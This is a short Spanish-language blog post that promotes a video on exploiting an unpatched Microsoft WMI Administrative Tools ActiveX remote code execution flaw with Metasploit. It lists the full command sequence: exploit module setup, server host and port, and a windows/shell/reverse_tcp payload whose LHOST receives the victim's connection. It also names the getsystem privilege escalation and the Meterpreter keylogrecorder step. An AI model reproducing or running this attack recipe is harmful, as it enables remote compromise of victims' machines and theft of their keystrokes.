Hace no tanto en Metasploiter.com han publicado un video de como sacarle provecho a una vuneravilidad [Microsoft WMI Administrative Tools ActiveX Control Remote Code Execution Vulnerability] (un bug bastante nuevo que no tiene parche por ahora) con Metasploit, en el video se muestra como manipular el exploit (la manipulación estandar: use exploit... set SRVHOST 193... etc, etc...) con el agregado de Escala de Privilegios (getsystem) y por último como activar la opción Keylogger desde Meterpreter (run keylogrecorder).
Un pequeño Recordatorio para que no se pierdan con Metasploit ;)
Code:
use exploit/windows/... (Exploit que vamos a utilizar)
set SRVHOST 192.129.180.132 (IP local donde va a montar el servicio)
set SRVPORT 8080 (Puerto local del servicio)
set URIPATH xxx03 (Uri del servicio ex. http://192.129.180.132/xxx03)
set payload windows/shell/reverse_tcp (Payload que vamos a utilizar)
set LHOST 192.129.180.132 (IP donde se conectará la víctima)
set LPORT 80 (Puerto local de escucha)
exploit (Ejecutamos el exploit)
0 Response for the "[Video Metasploit] Vulneravilidad WMI - Escala de privilegios - Keylogger"
Publicar un comentario